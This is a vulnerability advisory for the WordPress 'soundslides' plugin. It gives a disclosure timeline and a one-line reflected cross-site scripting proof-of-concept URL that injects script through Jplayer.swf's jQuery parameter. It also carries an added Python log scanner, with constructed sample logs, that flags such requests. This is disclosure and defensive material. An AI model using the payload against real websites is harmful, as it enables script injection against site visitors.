wp-plugin : soundslides

Plugin Details
Plugin Name: wp-plugin : soundslides
Affected Version : (and most probably lower versions, if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

127.0.0.1/wordpress/wp-content/wp-plugs/soundslides/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337dayTUNISIAN CYBER/)//
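
A log check a site operator could run for requests of the kind shown in the PoC, added here as an example and not part of the original advisory: it flags requests to Jplayer.swf whose jQuery parameter is not a plain dotted JavaScript identifier. The allow-list pattern, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate jQuery parameter is a dotted JavaScript identifier
# path (for example "jQuery" or a noConflict alias); anything else is flagged.
SAFE_VALUE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

# Request field of a common/combined access log line: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_swf_requests(log_lines):
    """Return (line_no, decoded_value) for Jplayer.swf requests whose
    jQuery parameter does not match the identifier allow-list."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        # Match the bundled player regardless of filename case.
        if not target.path.lower().endswith("/jplayer.swf"):
            continue
        # parse_qsl percent-decodes values, so encoded payloads are compared
        # in their decoded form.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == "jQuery" and not SAFE_VALUE.match(value):
                hits.append((line_no, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/May/2014:10:00:00 +0000] "GET /wordpress/wp-content/'
    'wp-plugs/soundslides/js/Jplayer.swf?jQuery=jQuery HTTP/1.1" 200 9120',
    '203.0.113.9 - - [25/May/2014:10:00:07 +0000] "GET /wordpress/wp-content/'
    'wp-plugs/soundslides/js/Jplayer.swf?jQuery=)%7Dcatch(e)%7B%7D// HTTP/1.1" 200 9120',
    '203.0.113.9 - - [25/May/2014:10:00:09 +0000] "GET /wordpress/index.php'
    '?jQuery=%3Cx%3E HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line_no, value in suspicious_swf_requests(SAMPLE_LOG):
        print(f"line {line_no}: unexpected jQuery parameter {value!r}")
```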


Disclosure Timeline
Vendor Contacted : 2013-12-26
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
This plugin allows easier integration of a Soundslides project into your WordPress website or blog. Upload a zip file of your project and then add the project to your post as you would an image or video. Soundslides is a software product that helps build audio slideshows from a collection of images and an audio file. Soundslides makes creating elegant slideshows a snap. Soundslides can help create very customized simple slideshows including controlled Ken Burns pans and zooms plus many other effects. The final project can be easily posted to your website or converted to video. Soundslides projects are regularly featured on the NY Times and The Guardian and many other major newspaper websites.